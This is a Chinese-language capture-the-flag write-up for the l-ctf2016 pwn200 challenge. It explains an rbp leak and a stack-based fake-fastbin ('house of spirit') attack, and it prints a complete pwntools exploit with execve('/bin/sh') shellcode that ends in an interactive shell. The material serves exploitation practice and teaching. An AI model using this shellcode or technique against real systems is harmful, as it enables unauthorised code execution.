l-ctf2016–pwn200 hose-of-spirite

原創 九层台 2020-06-19 17:10

在這裏插入圖片描述
這裏看可以輸入48個字節,最後沒有跟00能夠泄露出來rbp

從ida上面看是這樣的,id並沒有保存。
但是實際上
在這裏插入圖片描述
id被保存到了這裏。
var_38被定義爲
在這裏插入圖片描述
剛好再輸入的name上面。在棧上顯示如下圖

#coding=utf-8
from pwn import *
context(arch='amd64',os='linux')
context.log_level = 'debug'
p = process('./pwn200')
shellcode=""
shellcode += "\x00\x31\xf6\x48\xbb\x2f\x62\x69\x6e"
shellcode += "\x2f\x2f\x73\x68\x56\x53\x54\x5f"
shellcode += "\x6a\x3b\x58\x31\xd2\x0f\x05"
p.recvuntil('who are u?\n')
# gdb.attach(p,"b *0x0000000000400B2F")
p.send("a"*47+"b")
p.recvuntil("b")
rbp=p.recv(6).ljust(8,"\x00")
rbp_addr=u64(rbp)
print "rbp="+hex(rbp_addr)
print p.recvuntil("give me your id ~~?\n")
p.sendline(str(33))
p.recvuntil("give me money~")

shellcode_addr=rbp_addr-0xc0
free_addr=rbp_addr-0xf0+0x60
print "shellcode address="+hex(shellcode_addr)
print "free address="+hex(free_addr)
payload=shellcode
payload.ljust(0x20)
payload+=p64(0)+p64(0)+p64(0x40)+p64(0)+p64(free_addr)
#70:0   78:0x40
#80:0   38:ptr
#60:0   68:20
#相差0x40


p.send(payload)
gdb.attach(p)

當程序斷到這裏棧內的情況

在這裏插入圖片描述
第一個箭頭是shellcode的地址,第二個箭頭是輸入的id存放位置。
第三個箭頭是存放泄露rbp時輸入的值。

在這裏插入圖片描述
換成這樣看可以看到,在棧裏面僞造的fastbin。host of spirit
原理參考:

申請到這段內存之後
在這裏插入圖片描述
修改返回地址位爲shellcode地址

麻煩點:構造僞chunk,可以用gdb.attach查看具體內容然後計算

#coding=utf-8
from pwn import *
context(arch='amd64',os='linux')
context.log_level = 'debug'
p = process('./pwn200')
shellcode=""
shellcode += "\x00\x31\xf6\x48\xbb\x2f\x62\x69\x6e"
shellcode += "\x2f\x2f\x73\x68\x56\x53\x54\x5f"
shellcode += "\x6a\x3b\x58\x31\xd2\x0f\x05"
p.recvuntil('who are u?\n')
# gdb.attach(p,"b *0x0000000000400B2F")
p.send("a"*47+"b")
p.recvuntil("b")
rbp=p.recv(6).ljust(8,"\x00")
rbp_addr=u64(rbp)
print "rbp="+hex(rbp_addr)
print p.recvuntil("give me your id ~~?\n")
p.sendline(str(33))
p.recvuntil("give me money~")

shellcode_addr=rbp_addr-0xc0
free_addr=rbp_addr-0xf0+0x60
print "shellcode address="+hex(shellcode_addr)
print "free address="+hex(free_addr)
payload=shellcode
payload.ljust(0x20)
payload+=p64(0)+p64(0)+p64(0x40)+p64(0)+p64(free_addr)
#70:0   78:0x40
#80:0   38:ptr
#60:0   68:20
#相差0x40


p.send(payload)
gdb.attach(p)

p.recvuntil("your choice : ")
p.sendline("2")
p.recvuntil("your choice : ")
p.sendline("1")

p.recvuntil("how long?")
p.send(str(0x30)+"\n")

p.recvuntil("48\n")
p.sendline(p64(0)*3+p64(shellcode_addr+1))
gdb.attach(p)
p.recvuntil("your choice : ")
p.sendline("3")

p.interactive()
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

linux pwn練習0x01

文章目錄doubly_dangerousWarmUp關於確定溢出點的一種方法:gdb-peda關於利用ret調用shellcode函數調用方式的基本介紹pwn1just_do_it 題目 doubly_dangerous 內

yusakul 2020-07-07 13:34:36

linux pwn練習0x02

文章目錄tyro_shellcode tyro_shellcode OpenCTF : tyro_shellcode Baby’s first shellcode problem. Server: 172.31.1.43:161

yusakul 2020-07-07 13:34:36

XCTF進階區Crypto之flag_in_your_hand write up

下載下來查看html源碼和js源碼: <html> <head> <title>Flag in your Hand</title> <style type="text/css"> body { padding-

KogRow 2020-07-07 15:59:18

docker搭建pwn環境

文章目錄拉取ubuntu鏡像運行容器安裝環境修改apt源修改pip源安裝pwntools安裝pwndbg安裝ROPgadget、libc-database、one_gadget安裝tmux與主機拷貝文件保存容器爲新鏡像示例補充添加

yusakul 2020-07-07 13:34:36

SCTF2020

Snake 在輸入的地方有一次off by one的機會通過構造堆塊重疊然後做2次double free改寫got拿到shell exp: from pwn import * p=remote('39.107.244.116',9

doudoudedi 2020-07-06 14:30:05

防災科技學院GKCTF2020_misc wp

GKCTF_2020_misc0x01 簽到0x02 問卷調查0x03 Pokémon0x04 code obfuscation0x05 Harley Quinn0x06 Sail a boat down the river

marsxu626 2020-07-05 17:07:42

HITCON-Training lab5(自己構造rop)

看到靜態鏈接,一頓欣喜,直接ropchain生成,棧溢出找出來就ok啦?然後後來發現並沒有那麼簡單。。。 =================================================================

言承Yolanda 2020-07-08 01:37:40

HITCON-Training lab7(一道簡單的格式化字符串讀漏洞)

格式化字符串知道他的操作,可是做的一點也不熟練吧,,,BJDCTF上的r2t4不會啊,,,看不懂,,,所以就來補補格式化字符串的題目了,,,,   看到canary開啓了,我還以爲要泄漏canary呢,結果發現不用那麼麻煩,,, 其實

言承Yolanda 2020-07-08 01:37:40

HITCON-Training lab8(格式化字符串寫漏洞)

還在補格式化字符串漏洞的知識,,,,看到這道題的時候,有點懵,,,因爲發現218不會整,,,看官方writeup也不太行,,,   先知社區上有篇講的就很好了,,,nice,用了四種方法(最後一種沒看懂,,,),,,看完,BJDCTF那道

言承Yolanda 2020-07-08 01:37:40

BJDCTF 2nd - Pwn(r2t3、one_gadget、r2t4)

r2t3 最簡單的一道題,可是我竟然沒有做出來,無語了,,, 文件保護沒啥好說的,,,很正常 進入name_check函數 255 ==> 255 256 ==> 0,257 ==> 1,258 ==> 2,259 ==> 3, 2

言承Yolanda 2020-07-08 01:37:40

棧遷移學習(buuctf [Black Watch 入羣題])

i春秋的borrowstack是棧遷移和萬能gadget的混合,,,然後writeup看的不是很明白,也沒有很細的解析,所以,emmm,應該是自己棧遷移學的不是很好,只是知道大概的意思,但是還沒有做過題,這次在看雪看到文章,就好好學一下,

言承Yolanda 2020-07-08 01:37:40

BUUCTF刷題(前12道)

哈哈哈,我又來刷題了,看了下BUUCTF上面的pwn題還真多。。。 test_your_nc ida查看,發現直接執行system,所以,直接交互就可以 //寫下簡單的腳本 from pwn import * p = remote('

言承Yolanda 2020-07-08 01:37:40

逆向入門筆記之分析TraceMe.exe

TraceMe.exe是一個示例程序,用於逆向的學習,簡單地模擬了註冊機制。 我們把它拖進IDA中無腦F5一波: 雙擊DialogFunc進入這個函數: BOOL __stdcall DialogFunc(HWND hWnd, UIN

KogRow 2020-07-07 15:59:23

已知libc地址爆破TLS、ld.so等地址

已知libc地址爆破TLS、ld.so等地址 在大多數情況下,遠程的ld.so以及TLS等結構的地址與libc地址之間的偏移與本地的會不一樣,但是大致處於一個範圍內,並且,在同一個系統裏,這個差值是固定的,其差值的變化往往在偏移的第1.5

haivk 2020-07-05 02:32:56

ACTF_2019_ACTFNOTE(top chunk上移)

ACTF_2019_ACTFNOTE 首先,檢查一下程序的保護機制 然後,我們用IDA分析一下,edit裏存在溢出,可以直接修改top chunk的size 那麼只需要把top chunk的size修改爲-1,然後malloc(負數)

haivk 2020-07-05 02:32:56